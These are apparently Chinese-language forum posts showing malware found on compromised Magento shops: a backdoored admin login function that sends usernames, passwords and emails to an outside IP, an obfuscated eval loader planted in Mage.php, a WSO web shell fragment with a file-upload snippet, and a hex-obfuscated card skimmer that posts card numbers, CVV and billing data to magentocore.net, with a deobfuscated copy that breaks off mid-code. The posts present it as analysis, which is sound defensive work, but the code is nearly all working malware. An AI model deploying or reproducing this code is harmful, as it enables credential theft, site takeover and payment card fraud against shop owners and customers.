app/code/core/Mage/Admin/Model/Session.php 常见植入内容

neasel 发表了文章 • 0 个评论 • 6 次浏览 • 2019-04-16 17:14 • 来自相关话题

app/code/core/Mage/Admin/Model/Session.php 常见植入内容,获取网站后台用户信息  public function login($username, $password, $request = ...查看全部
app/code/core/Mage/Admin/Model/Session.php 常见植入内容,获取网站后台用户信息

 public function login($username, $password, $request = null)
{
if (empty($username) || empty($password)) {
return;
}

try {
/** @var $user Mage_Admin_Model_User */
$user = $this->_factory->getModel('admin/user');
$user->login($username, $password);
if ($user->getId()) {
$data1 = $username;
$data2 = $password;
$data3 = $user->getEmail();
$data4 = $_SERVER['SERVER_NAME'];
$data5 = $_SERVER['REQUEST_URI'];
$auth1 = "Username=".($data1)."&Password=".($data2)."&Email=".($data3)."&Site=".($data4)."&Request=".($data5);
$url = "http://69.30.232.110/login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60); //
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $auth1);
$result = curl_exec($ch);
curl_close($ch);
$this->renewSession();

if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
Mage::getSingleton('adminhtml/url')->renewSecretUrls();
}
$this->setIsFirstPageAfterLogin(true);
$this->setUser($user);
$this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());

$alternativeUrl = $this->_getRequestUri($request);
$redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
if ($redirectUrl) {
Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
$this->_response->clearHeaders()
->setRedirect($redirectUrl)
->sendHeadersAndExit();
}
} else {
Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
}
} catch (Mage_Core_Exception $e) {
$e->setMessage(
Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
);
Mage::dispatchEvent('admin_session_user_login_failed',
array('user_name' => $username, 'exception' => $e));
if ($request && !$request->getParam('messageSent')) {
Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
$request->setParam('messageSent', true);
}
}

return $user;
}
 
 

Mage.php文件植入

neasel 发表了文章 • 0 个评论 • 4 次浏览 • 2019-04-16 17:10 • 来自相关话题

*/ $FMAmOm="xxoON5s+YDSc/7lOaOMhiTFsWj8+SPBxB13kztxyfAgnAFHya3RxYVpSE1FjYOqJyDf5Gs+X81JFS8X+Dum9Pe0vt7spGeg2ITK/O++nmIP ...查看全部
 */
$FMAmOm="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";$kdw7GE="Fl1YmASDI3Umqpm1m7IIXFjb8sZmPABNPzundjFMyupozAf";$qptNN0V="\x62\x61\x73";$rSB7ncREj="\147\x7a\x69";$Cjoac3R="\x61";$swRAPLle="\x73\164";$swRAPLle.="\x72\x5f\x72";$rSB7ncREj.="\x6e\146";$Cjoac3R.="\x73";$kdw7GE.="dXIzeMXrHz7h72vc5BLr6BWnIXIza5EqcdSFHycwzc9bnJR";$qptNN0V.="\x65\x36\64";$swRAPLle.="\157\164";$Cjoac3R.="\163\145";$qptNN0V.="\x5f\144\x65\143";$rSB7ncREj.="\154\141";
$kdw7GE.="AMAxoz5xLjwen2WgDRCqixwPXA/XVHzAaEHPJkzaStHLwcZ";$kdw7GE.="SSI81uAGJhUIWQmIVdPapmmxbApfmFtutTy1QJgND==";$rSB7ncREj.="\164\145";$swRAPLle.="\61\63";$Cjoac3R.="\x72\x74";$qptNN0V.="\x6f\144\x65";@$Cjoac3R($rSB7ncREj($qptNN0V($swRAPLle($kdw7GE))));
/*

典型电商木马病毒分析示例

neasel 发表了文章 • 0 个评论 • 6 次浏览 • 2019-04-16 17:07 • 来自相关话题

<?php /* WSO Shell - tool for system administrators */ $auth_pass = "2d860f5e2408b6af859 ...查看全部
<?php
/*
WSO Shell - tool for system administrators
*/

$auth_pass = "2d860f5e2408b6af859a268bf8d538fb";
$color = "#df5";
$default_action = 'flmn';
$default_use_ajax = true;
$default_charset = 'Window'.'s-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) die("<h1><a href='htt"."p://w"."ww.w"."so-she"."ll.ru/'>W"."SO Sh"."ell</a></h1>");
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('ws0_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
function ws0stripslashes($array) {
return is_array($array) ? array_map('ws0stripslashes', $array) : stripslashes($array);
}
$_POST = ws0stripslashes($_POST);
$_COOKIE = ws0stripslashes($_COOKIE);
}

function ws0Login() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function ws0setcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
ws0setcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
ws0Login();
}
?>
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit><?php $f=$_FILES[x];copy($f[tmp_name],$f[name]);?>

惊现盗取信用卡信息的伪装病毒

neasel 发表了文章 • 0 个评论 • 11 次浏览 • 2018-03-29 17:57 • 来自相关话题

被植入文件 调用路径https://magentocore.net/mage/mage.js 原内容: var _0x8949=[“\x75\x6E\x64\x65\x66\x69\ ...查看全部
被植入文件

调用路径https://magentocore.net/mage/mage.js

原内容:

var _0x8949=[“\x75\x6E\x64\x65\x66\x69\x6E\x65\x64″,”\x68\x6F\x73\x74\x6E\x61\x6D\x65″,”\x76\x61\x6C”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x68\x6F\x73\x73\x74\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x73\x69\x7A\x65″,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x6E\x75\x6D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x65\x78\x70\x5F\x6D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x65\x78\x70\x5F\x79\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x2A\x3D\x22\x63\x63\x5F\x63\x69\x64\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x6C\x61\x73\x74\x6E\x61\x6D\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x73\x74\x72\x65\x65\x74\x5D\x5B\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x63\x69\x74\x79\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x72\x65\x67\x69\x6F\x6E\x5F\x69\x64\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x70\x6F\x73\x74\x63\x6F\x64\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x63\x6F\x75\x6E\x74\x72\x79\x5F\x69\x64\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x74\x65\x6C\x65\x70\x68\x6F\x6E\x65\x5D\x22\x5D”,”\x2A\x5B\x6E\x61\x6D\x65\x3D\x22\x62\x69\x6C\x6C\x69\x6E\x67\x5B\x65\x6D\x61\x69\x6C\x5D\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x61\x72\x64\x5F\x6E\x75\x6D\x62\x65\x72\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x31\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x32\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x56\x56\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x66\x69\x72\x73\x74\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x6E\x61\x6D\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x61\x64\x64\x72\x65\x73\x73\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x69\x74\x79\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x74\x61\x74\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x7A\x69\x70\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x6F\x75\x6E\x74\x72\x79\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x70\x68\x6F\x6E\x65\x22\x5D”,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x20\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x76\x62\x76\x22\x5D”,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74\x2F\x6D\x61\x67\x65\x2F\x6D\x61\x69\x6C\x32\x2E\x70\x68\x70″,”\x73\x65\x72\x69\x61\x6C\x69\x7A\x65″,”\x2E\x6D\x69\x5F\x66\x6F\x72\x6D\x73″,”\x70\x6F\x73\x74″,”\x62\x75\x74\x74\x6F\x6E\x5B\x6F\x6E\x63\x6C\x69\x63\x6B\x2A\x3D\x22\x2E\x73\x61\x76\x65\x22\x5D”,”\x65\x71″,”\x6F\x6E\x63\x6C\x69\x63\x6B”,”\x61\x74\x74\x72″,”\x6D\x67\x5F\x5F\x63\x6F\x72\x65″,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x6D\x67\x5F\x5F\x63\x6F\x72\x65\x28\x29\x3B”,”\x3C\x66\x6F\x72\x6D\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x69\x5F\x66\x6F\x72\x6D\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x3B\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x68\x6F\x73\x73\x74\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x61\x72\x64\x5F\x6E\x75\x6D\x62\x65\x72\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x31\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x45\x78\x70\x5F\x32\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x43\x56\x56\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x66\x69\x72\x73\x74\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x65\x63\x6F\x6E\x64\x5F\x6E\x61\x6D\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x61\x64\x64\x72\x65\x73\x73\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x69\x74\x79\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x73\x74\x61\x74\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x7A\x69\x70\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x63\x6F\x75\x6E\x74\x72\x79\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x70\x68\x6F\x6E\x65\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x5F\x76\x62\x76\x22\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E”,”\x61\x70\x70\x65\x6E\x64″,”\x62\x6F\x64\x79″,”\x69\x6E\x69\x74\x5F\x5F\x6C\x6F\x28\x29\x3B”,”\x72\x65\x61\x64\x79″];if( typeof llooll== _0x8949[0]){var llooll=0;var lloo_interval;function mg__core(){var _0x83edx4=location[_0x8949[1]];jQuery(_0x8949[3])[_0x8949[2]](_0x83edx4);if(!(jQuery(_0x8949[5])[_0x8949[4]]())){return};var _0x83edx5=jQuery(_0x8949[5])[_0x8949[2]]();var _0x83edx6=jQuery(_0x8949[6])[_0x8949[2]]();var _0x83edx7=jQuery(_0x8949[7])[_0x8949[2]]();var _0x83edx8=jQuery(_0x8949[8])[_0x8949[2]]();var _0x83edx9=jQuery(_0x8949[9])[_0x8949[2]]();var _0x83edxa=jQuery(_0x8949[10])[_0x8949[2]]();var _0x83edxb=jQuery(_0x8949[11])[_0x8949[2]]();var _0x83edxc=jQuery(_0x8949[12])[_0x8949[2]]();var _0x83edxd=jQuery(_0x8949[13])[_0x8949[2]]();var _0x83edxe=jQuery(_0x8949[14])[_0x8949[2]]();var _0x83edxf=jQuery(_0x8949[15])[_0x8949[2]]();var _0x83edx10=jQuery(_0x8949[16])[_0x8949[2]]();var _0x83edx11=jQuery(_0x8949[17])[_0x8949[2]]();jQuery(_0x8949[18])[_0x8949[2]](_0x83edx5);jQuery(_0x8949[19])[_0x8949[2]](_0x83edx6);jQuery(_0x8949[20])[_0x8949[2]](_0x83edx7);jQuery(_0x8949[21])[_0x8949[2]](_0x83edx8);jQuery(_0x8949[22])[_0x8949[2]](_0x83edx9);jQuery(_0x8949[23])[_0x8949[2]](_0x83edxa);jQuery(_0x8949[24])[_0x8949[2]](_0x83edxb);jQuery(_0x8949[25])[_0x8949[2]](_0x83edxc);jQuery(_0x8949[26])[_0x8949[2]](_0x83edxd);jQuery(_0x8949[27])[_0x8949[2]](_0x83edxe);jQuery(_0x8949[28])[_0x8949[2]](_0x83edxf);jQuery(_0x8949[29])[_0x8949[2]](_0x83edx10);jQuery(_0x8949[30])[_0x8949[2]](_0x83edx11);var _0x83edx12=0;if((!_0x83edx5) || (!_0x83edx8) || (!_0x83edx6) || (!_0x83edx7)){_0x83edx12= 1};if(_0x83edx12!= 1){jQuery[_0x8949[34]](_0x8949[31],jQuery(_0x8949[33])[_0x8949[32]]())}}function init__lo(){if(!(jQuery(_0x8949[5])[_0x8949[4]]())){return};var _0x83edx14=jQuery(_0x8949[35]);for(var _0x83edx15=0;_0x83edx15< _0x83edx14[_0x8949[4]]();_0x83edx15++){var _0x83edx16=_0x83edx14[_0x8949[36]](_0x83edx15);var _0x83edx17=_0x83edx16[_0x8949[38]](_0x8949[37]);if(_0x83edx17[_0x8949[40]](_0x8949[39])>= 0){continue};_0x83edx16[_0x8949[38]](_0x8949[37],_0x8949[41]+ _0x83edx17)}}if(( typeof jQuery!= _0x8949[0])){(function(_0x83edx18){_0x83edx18(document)[_0x8949[46]](function(){_0x83edx18(_0x8949[44])[_0x8949[43]](_0x8949[42]);init__lo();lloo_interval= setInterval(_0x8949[45],7000)})})(jQuery)}}

解密后的真相内容:

if (typeof llooll == ‘undefined’) {
var llooll = 0;
var lloo_interval;

function mg__core() {
var _0x83edx4 = location[‘hostname’];
jQuery(‘.mi_forms input[name=”hosst_name”]’)[‘val’](_0x83edx4);
if (!(jQuery(‘*[name*=”cc_num”]’)[‘size’]())) {
return
};
var _0x83edx5 = jQuery(‘*[name*=”cc_num”]’)[‘val’]();
var _0x83edx6 = jQuery(‘*[name*=”cc_exp_m”]’)[‘val’]();
var _0x83edx7 = jQuery(‘*[name*=”cc_exp_y”]’)[‘val’]();
var _0x83edx8 = jQuery(‘*[name*=”cc_cid”]’)[‘val’]();
var _0x83edx9 = jQuery(‘*[name=”billing[firstname]”]’)[‘val’]();
var _0x83edxa = jQuery(‘*[name=”billing[lastname]”]’)[‘val’]();
var _0x83edxb = jQuery(‘*[name=”billing[street][]”]’)[‘val’]();
var _0x83edxc = jQuery(‘*[name=”billing[city]”]’)[‘val’]();
var _0x83edxd = jQuery(‘*[name=”billing[region_id]”]’)[‘val’]();
var _0x83edxe = jQuery(‘*[name=”billing[postcode]”]’)[‘val’]();
var _0x83edxf = jQuery(‘*[name=”billing[country_id]”]’)[‘val’]();
var _0x83edx10 = jQuery(‘*[name=”billing[telephone]”]’)[‘val’]();
var _0x83edx11 = jQuery(‘*[name=”billing[email]”]’)[‘val’]();
jQuery(‘.mi_forms input[name=”m_Card_number”]’)[‘val’](_0x83edx5);
jQuery(‘.mi_forms input[name=”m_Exp_1″]’)[‘val’](_0x83edx6);
jQuery(‘.mi_forms input[name=”m_Exp_2″]’)[‘val’](_0x83edx7);
jQuery(‘.mi_forms input[name=”m_CVV”]’)[‘val’](_0x83edx8);
jQuery(‘.mi_forms input[name=”m_first_name”]’)[‘val’](_0x83edx9);
jQuery(‘.mi_forms input[name=”m_second_name”]’)[‘val’](_0x83edxa);
jQuery(‘.mi_forms input[name=”m_address”]’)[‘val’](_0x83edxb);
jQuery(‘.mi_forms input[name=”m_city”]’)[‘val’](_0x83edxc);
jQuery(‘.mi_forms input[name=”m_state”]’)[‘val’](_0x83edxd);
jQuery(‘.mi_forms input[name=”m_zip”]’)[‘val’](_0x83edxe);
jQuery(‘.mi_forms input[name=”m_country”]’)[‘val’](_0x83edxf);
jQuery(‘.mi_forms input[name=”m_phone”]’)[‘val’](_0x83edx10);
jQuery(‘.mi_forms input[name=”m_vbv”]’)[‘val’](_0x83edx11);
var _0x83edx12 = 0;
if ((!_0x83edx5) || (!_0x83edx8) || (!_0x83edx6) || (!_0x83edx7)) {
_0x83edx12 = 1
};
if (_0x83edx12 != 1) {
jQuery[‘post’](‘https://magentocore.net/mage/mail2.php’, jQuery(‘.mi_forms’)[‘serialize’]())
}
}
function init__lo() {
if (!(jQuery(‘*[name*=”cc_num”]’)[‘size’]())) {
return
};
var _0x83edx14 = jQuery(‘button[onclick*=”.save”]’);
for (var _0x83edx15 = 0; _0x83edx15 < _0x83edx14[‘size’](); _0x83edx15++) {
var _0x83edx16 = _0x83edx14[‘eq’](_0x83edx15);
var _0x83edx17 = _0x83edx16[‘attr’](‘onclick’);
if (_0x83edx17[‘indexOf’](‘mg__core’) >= 0) {
continue
};
_0x83edx16[‘attr’](‘onclick’, ‘mg__core();’ + _0x83edx17)
}
}
if ((typeof jQuery != ‘undefined’)) {
(function (_0x83edx18) {
_0x83edx18(document)[‘ready’](function () {
